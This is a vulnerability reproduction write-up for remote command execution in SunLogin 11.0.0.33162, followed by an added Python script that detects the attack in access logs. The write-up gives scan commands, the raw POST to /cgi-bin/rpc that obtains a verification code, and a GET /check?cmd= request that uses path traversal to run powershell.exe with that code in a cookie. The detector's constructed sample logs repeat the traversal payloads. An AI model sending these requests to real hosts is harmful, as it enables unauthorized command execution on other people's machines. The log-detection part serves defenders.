Reproduced version
SunLogin 11.0.0.33162
Reproduction steps
1. Port scan
Scan the target's ports with nmap:
<code>nmap -A -p- -T4 -vv 192.168.43.85</code>
Or scan with the dedicated tool:
<code>./xrkRce -h 192.168.43.85 -p 1-65535 -t scan</code>
2. Exploitation
HTTP access
- Obtain the verification code:
<pre><code>POST /cgi-bin/rpc HTTP/1.1
Host: 192.168.43.85:49164
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 19

action=verify-hara</code></pre>
- Build and run the command
Place the control code in the Cookie header, in the format <code>Cookie: CID=&lt;control code&gt;</code>.
For example, appending a command to <code>ping</code>:
<pre><code>GET /check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+WHOAMI HTTP/1.1
Host: 192.168.43.85:49164
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: CID=6onb943qKJoXQGAmr1BKArugFlO9949g
Upgrade-Insecure-Requests: 1</code></pre>
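The two request shapes shown above (a POST to <code>/cgi-bin/rpc</code> followed by a <code>GET /check?cmd=</code> whose value climbs out of the intended directory with <code>../</code>) are what a defender would look for in the HTTP access log of the exposed agent. The script below is an added example written for this page, not part of the original write-up or of the SunLogin software: it parses constructed log lines in a combined-log-style format (an assumption; the real service's log format is not described on the page), flags POSTs to <code>/cgi-bin/rpc</code> so they can be correlated with the <code>/check</code> requests that follow, and flags any <code>cmd</code> value that, after URL decoding, contains a traversal sequence or points at an executable. The sample log lines and the IP addresses in them are constructed.

```python
import re
from collections import namedtuple
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined-log style, assumed format).
# Line 1: the verification-code fetch; line 2: the traversal request from the page;
# line 3: a plain /check?cmd=ping that should not be flagged;
# line 4: the same traversal with percent-encoded slashes and a different binary.
SAMPLE_LOG = """\
192.168.43.10 - - [01/Jan/2023:10:00:01 +0800] "POST /cgi-bin/rpc HTTP/1.1" 200 64 "-" "Mozilla/5.0"
192.168.43.10 - - [01/Jan/2023:10:00:02 +0800] "GET /check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+WHOAMI HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.43.20 - - [01/Jan/2023:10:01:00 +0800] "GET /check?cmd=ping HTTP/1.1" 200 40 "-" "Mozilla/5.0"
192.168.43.30 - - [01/Jan/2023:10:02:00 +0800] "GET /check?cmd=ping..%2F..%2F..%2Fwindows%2Fsystem32%2Fcmd.exe+dir HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# source, timestamp, method, request target, status code
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# "../" or "..\" anywhere in the decoded command value
TRAVERSAL_RE = re.compile(r'\.\./|\.\.\\')
# a reference to a Windows executable inside the command value
EXE_RE = re.compile(r'\.exe\b', re.IGNORECASE)

Finding = namedtuple("Finding", "src timestamp kind detail")


def classify_cmd(decoded_cmd):
    """Classify one already-decoded cmd value; None means nothing suspicious."""
    if TRAVERSAL_RE.search(decoded_cmd):
        return "path-traversal"
    if EXE_RE.search(decoded_cmd):
        return "executable-reference"
    return None


def inspect_request(method, target):
    """Return (kind, detail) for one request line, or None if it looks benign."""
    url = urlsplit(target)
    if method == "POST" and url.path == "/cgi-bin/rpc":
        # The verification code is fetched here; on its own this is not proof of
        # abuse, but a /check traversal from the same source shortly after is.
        return "rpc-request", target
    if url.path == "/check":
        # parse_qs percent-decodes the value and turns '+' into a space,
        # so "powershell.exe+WHOAMI" becomes "powershell.exe WHOAMI".
        for decoded in parse_qs(url.query, keep_blank_values=True).get("cmd", []):
            kind = classify_cmd(decoded)
            if kind:
                return kind, decoded
    return None


def scan_log(text):
    """Parse every line of an access log and return the list of Findings."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        result = inspect_request(m["method"], m["target"])
        if result:
            kind, detail = result
            findings.append(Finding(m["src"], m["ts"], kind, detail))
    return findings


def sources_with_rpc_then_traversal(findings):
    """Sources that fetched a code via /cgi-bin/rpc and later sent a traversal /check."""
    seen_rpc = set()
    hits = set()
    for f in findings:  # findings keep log order, so "later" is positional
        if f.kind == "rpc-request":
            seen_rpc.add(f.src)
        elif f.kind == "path-traversal" and f.src in seen_rpc:
            hits.add(f.src)
    return hits


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.src} {f.timestamp} {f.kind}: {f.detail}")
    print("correlated sources:", sources_with_rpc_then_traversal(scan_log(SAMPLE_LOG)))
```

Only the <code>cmd</code> value is inspected, and it is inspected after decoding, so a percent-encoded <code>%2F</code> is caught the same way as a literal slash; the plain <code>cmd=ping</code> request on line 3 produces no finding. The correlation helper is deliberately conservative: it only reports a source once it has both fetched a code and sent a traversal request, which is the sequence the write-up above describes.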
With the steps above, reproduction and exploitation of the vulnerability in SunLogin 11.0.0.33162 is complete.